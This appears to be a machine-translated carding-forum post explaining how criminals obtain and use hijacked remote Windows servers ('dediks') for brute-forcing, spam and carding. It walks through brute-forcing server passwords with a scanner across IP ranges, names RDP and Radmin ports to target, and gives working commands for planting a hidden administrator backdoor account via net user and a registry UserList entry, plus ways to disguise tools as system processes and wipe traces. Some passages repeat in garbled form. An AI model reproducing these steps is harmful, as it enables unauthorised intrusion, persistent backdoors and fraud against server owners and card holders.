Dedicated Server (RDP) FAQ. What are "Dedic" and what they are eaten with.

Carding

Professional
Messages
2,871
Reaction score
2,331
Points
113
The article was created for general development and updating \ obtaining new knowledge in this area. I am not teaching you to do anything, I am only teaching you a theory.

It will be useful for those new to this business or those who would like to learn something new.

Dedik - obviously came from the English word "dedicated", which means dedicated from English. Dediks, as they are usually called, on which there are quite powerful network interfaces, channels and a rather weak hardware configuration are used for data processing, as well as for storing databases or any other material located on them for servicing personnel, companies or organizations.

How to connect to Dedicated Server?

You can connect to Dedicated Server using the built-in Windows utility: Remote Desktop Connection. Start => Programs => Accessories => Communication => Remote Desktop Connection. You can also do this: Start => Run => mstsc. Another utility for connecting to a Dedicated Server is [BL4CK] VNC Viewer: Authentication Bypass. Just run it and enter the ip address of the Dedicated Server. You can also use Dedicated Server by Radmin if it is installed on Dedicated Server.

What do you need to pay attention to when choosing a Dedicated Server?

Channel, Memory (RAM), Stone (processor), OS. Here are some examples:

Quote: Intel (R) Pentium (R) 4 CPU 2.80GHz, 3.00 GB of RAM \ 2003 os \ 1 gb

Intel (R) Pentium (R) 4 CPU 3.20GHz, 2.00 GB of RAM \ 2003 os \ 100 mb

Intel (R) Xeon (TM) CPU 3.06GHz \ 3.80 GB of RAM \ 2003 os \ 100 mb

What is Dedicated Server (RDP) for?

Well, for example, for brute, hacking, carding, scam, flood, spam, gray schemes.

Where can I get a Dedicated Server?

1. Purchase.
2. Hacking the server.
3. Distribution.

How to hack a Dedicated Server?

You can scan Dedics with simple TCP / IP scanners So, there is such a program that you can find on the network, and it is called NTSCAN. It does the following: when a certain range is selected, it scans the server for simple passwords. The program has a pretty good choice of attack method, and the likelihood of hacking the server with its help is very high, since admins often set simple passwords to the server, especially on foreign ones. The program works on the brutal principle: it sends a request for authorization on the server and receives a response from the north. If authorization is successful, it displays a list of servers at the bottom of the program. Now the main thing is to select the scanning range and configure the program for efficient operation. At the top, we enter the range of IP servers, as you probably already understood. Further, HostFile - a list of hosts (I did not use this option), here you can create a file with specific hosts and brute-force specific hosts. I left the streams as they are: 50, Timeout - the same. ConnectShare - connection to shared resources. You can choose the attack method: IPCscan, SMBscan, WMIscan. Further, "ping from host" - ping hosts, that is, checking for survivability of the host before attempting an attack, so as not to brute-force dead hosts. Scan host opened port - scan hosts with open port 139, but you can also change it if you want. Speed - speed of work of brute (brute-force passwords). "ping from host" - ping hosts, that is, checking the host's survivability before attempting an attack, so as not to idle dead hosts. Scan host opened port - scan hosts with open port 139, but you can also change it if you want. Speed - the speed of the brute-force (brute-forcing passwords). "ping from host" - ping hosts, that is, checking the host's survivability before attempting an attack, so as not to idle dead hosts. Scan host opened port - scan hosts with open port 139, but you can also change it if you want. Speed - speed of work of brute (brute-force passwords).

What ports should you scan?

TCP ports: 3389 is the port used by Remote Desktop

Port 4899, which is used by the radmin - the Remote Administrator program.

I have a Dedicated Server, I want to add a new user. How to implement this?

Open Administrative Tools => Computer Management => find the Local Users and Groups tab => right-click on the Users tab => Create new user.

Code:
net user username / add

net start (stop) service_name

How to disguise your arrival?

First, we need to create our own account. Because if we sit through the administrator's account, then it is 90% that he will lose us! We don’t need that! So read carefully how to make your account on someone else's Dedicated Server, and hide it! We will do this through the command line! Run the command line (Start> Run> cmd.exe) and write in it:

net user (here we write the login and password of the account that we will create! We do this through a space.)

/ add net localgroup Administrators (Here we indicate the name that you should have specified in the first line)

/ add net localgroup "Remote Desktop Users" (Here we also indicate the name that was indicated in the line above)

/ add net accounts / maxpwage: unlimited

Let's say you want to create an account named admin and password test. Then you should have this:

Code:
net user admin test / add

net localgroup Administrators admin / add

net localgroup "Remote Desktop Users" admin / add

net accounts / maxpwage: unlimited

How to hide yourself among other users?

Go to the registry (Start> Run> regedit.exe) go to HKEY_LOCAL_MACHINEHKEY_LOCAL_MACHINESOFTWARE Microsoft Windows NT CurrentVersion Winlogon SpecialAccounts UserList and create a new DWORD parameter there (right-click, new DWORD parameter)
We call this parameter the name of your account, and a numeric value.

Next, we need to hide the folder with our account, with all subdirectories and files. To do this, go to C: Documents and Settings and hide our folder there. (Right-click> properties> check the "hidden" box and click apply).

Then we go to C: WINDOWS system32 and create a folder (any name) But that's all now you can safely go to the Dedicated Server under your username and password. Now after we have logged in with our username and password, we need to hide the folder we made. This is done with the right mouse button.
 
It is called so because of its English name "dedicated". It is such a server, when connected to which a real physical computer is presented. From a computer, you connect to another computer in general and work through it)

What is it for?

He's got a shit about the possibilities. It depends more on your imagination) In fact, everything that can be done with an ordinary computer is also possible with a Dedicated Computer. Only the Dedicated server gives you anonymity, the ability to work around the clock without leaving your computer turned on all this time + you do not load either your hardware or your Internet) There are a lot of advantages. Most often, the Dedicated Server is used for brute-force, sending spam and for many other dark deeds, such as carding)

How to choose the right Dedicated Server?

You need to look at the parameters of the hardware and the Internet, depending on the task at hand. Suppose if you want to brut on a Dedicated server, and you know that your program for brutus uses a graphics card, then choose a grandfather with a graphics card more powerful, if the program uses a percentage, then the percentage is in priority, respectively)

And of course, you should pay attention to the location of the Dedicated Server, this is also very important. I think you understand that if you want to take a Dedicated Dedicated File for American sites with US material, then it would be illogical to take Dedicated Files for this somewhere in Romania)

Where can I get it?

The simplest thing is, of course, to buy. The price of a Dedicated Server is on average from 2 to 20 bucks, depending on its parameters.

Sometimes they also distribute Dedicas for free on the forums or some sites arrange promotions, but this is rare + such Dedics are usually with some restrictions, or, more simply, bullshit. For a carding, such Dediks will not work. They have all the IPs in black, etc.

How to use Dedicated Server?

Let's consider the standard method using the built-in program in Windows) Press "Start", then select "Run", type "mstsc" and press Enter. In the window that appears, you will need to enter the name of the computer, this will be a specific IP address, after that we press additionally, enter the name of the account. Click “Connect.” After connecting, type in the password and click “OK”.

That's all, we connected to the Dedicated Server)

Now the main thing is to hide your presence in order to use the Dedicated Server as long as possible. Indeed, most often the owner of the hardware is not aware that someone else is using his computer. Imagine yourself in his place) Would cut off access right away, wouldn't you? Therefore, we disguise ourselves. You need to create your account and hide it. Click: "start", then "run", write cmd and enter:
Code:
net user teacher 123123777 / add

press Enter and type the following command:
Code:
net localgroup Administrators teacher / add

After this procedure, an account will be created with the teacher login and password 123123777)

Then we will hide our account. We go into the registry (Start> Run> regedit.exe) and look for the HKEY_LOCAL_MACHINE item, then into the SOFTWARE folder, then Microsoft, then Windows NT, there we select CurrentVersion, then Winlogon, well, SpecialAccounts and UserList. Now you need to create a new DWORD parameter there (you need to right-click and select "new DWORD parameter"). Give it an account name. By default, it is created with a value of 0, this is what we need, do not touch anything)

Now, for completeness, let's hide the folder with our account. To do this, open my computer, then drive C, then the Users folder and right-click on our account folder, select properties and put the checkbox on "hidden" and click ok or apply.

After all this has been done, we exit and go to the Dedicated Server under our new account)

How to transfer a program to a Dedicated Server? Just download from the Internet. If the program is not on the Internet, then upload it from your computer to any file hosting service and download it again.

We hide our programs deeper, you can go to system folders, as a rule, rarely anyone crawls there) It is also advisable to rename the programs for system processes so as not to burn in the task manager. Let's say the browser can be renamed to explorer.exe. We clean everything with the CCleaner program. Do not overload the Dedicated Engine too much, otherwise it will start to slow down and burn)

I do not advise you to reboot the Dedicated Server, as this is a big pale, use it as a last resort.
 
Top